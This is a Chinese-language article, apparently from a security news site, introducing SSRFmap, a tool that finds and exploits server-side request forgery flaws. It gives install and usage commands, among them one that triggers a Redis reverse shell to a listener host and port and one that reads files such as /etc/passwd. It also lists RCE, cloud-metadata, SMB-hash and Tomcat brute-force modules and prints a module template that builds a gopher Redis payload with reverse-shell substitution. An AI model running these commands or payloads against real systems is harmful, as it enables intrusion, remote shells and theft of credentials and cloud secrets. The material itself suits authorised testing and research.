SSRFmap:一款功能強大的自動化SSRF模糊測試&漏洞利用工具
SSRF,即 伺服器端請求偽造 ,很多網路犯罪分子都會利用SSRF來攻擊或入侵網路服務。今天我們給大家介紹的這款工具名叫SSRFmap,它可以尋找並利用目標網路服務中的SSRF漏洞。
SSRFmap以Burp請求檔案作為輸入,研究人員可以利用引數選項來控制模糊測試的操作程序。
專案地址
SSRFmap:【 GitHub傳送門 】
工具安裝
大家可以直接從GitHub程式碼庫中克隆該專案至本地:
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py
usage:ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lportLPORT] [--level LEVEL]
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverseshell
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--level [LEVEL] Level of test to perform (1-5, default: 1)
工具使用
SSRFmap的預設使用方法如下:
#Launch a portscan on localhost and read default files python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan #Triggering a reverse shell on a Redis python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242-l 4242 # -lcreate a listener for reverse shell on the specified port #--lhost and --lport work like in Metasploit, these values are used to create areverse shell payload #--level : ability to tweak payloads in order to bypass some IDS/WAF. e.g:127.0.0.1 -> [::] -> 0000: -> ...
大姐可以使用data/example.py來測試框架是否能夠正常執行:
FLASK_APP=data/example.pyflask run & python ssrfmap.py -r data/request.txt -p url -m readfiles
功能模組
SSRFmap已整合了下列功能模組,大家可以使用-m引數來選擇使用:
模組名稱 | 模組描述 |
fastcgi | FastCGI RCE |
redis | Redis RCE |
github | Github 企業版 RCE < 2.8.7 |
zabbix | Zabbix RCE |
mysql | MySQL 命令執行 |
docker | Docker Infoleaks ( API ) |
smtp | SMTP 郵件傳送 |
Portscan | 主機埠掃描 |
networkscan | HTTP Ping sweep |
readfiles | 檔案讀取,例如 /etc/passwd |
alibaba | 從供應商處讀取檔案 ( 例如 : meta-data, user-data) |
aws | 從供應商處讀取檔案 ( 例如 : meta-data, user-data) |
gce | 從供應商處讀取檔案 ( 例如 : meta-data, user-data) |
digitalocean | 從供應商處讀取檔案 ( 例如 : meta-data, user-data) |
socksproxy | SOCKS4 代理 |
smbhash | 通過 UNC Path 破解 SMB 認證 |
tomcat | 爆破 Tomcat Manager |
如果各位想針對特定服務新增自己的功能模組,可以參考下面這個模板程式碼:
from core.utils import *
import logging
name = "servicename inlowercase"
description = "ServiceName RCE - What does itdo"
author = "Name or pseudo of theauthor"
documentation= [" http://link_to_a_research ", " http://another_link "]
class exploit():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "4242"
def __init__(self, requester, args):
logging.info("Module '{}' launched!".format(name))
# Handle args for reverse shell
if args.lhost == None: self.SERVER_HOST= input("Server Host:")
else: self.SERVER_HOST = args.lhost
if args.lport == None: self.SERVER_PORT= input("Server Port:")
else: self.SERVER_PORT = args.lport
# Data for the service
# Using a generator to create the hostlist
# Edit the following ip if you need totarget something else
gen_host =gen_ip_list("127.0.0.1", args.level)
for ip in gen_host:
port = "6379"
data ="*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
payload = wrapper_gopher(data, ip ,port)
# Handle args for reverse shell
payload = payload.replace("SERVER_HOST",self.SERVER_HOST)
payload =payload.replace("SERVER_PORT", self.SERVER_PORT)
# Send the payload
r =requester.do_request(args.param, payload)
*參考來源: SSRFmap ,FB小編Alpha_h4ck編譯,轉載請註明來自FreeBuf.COM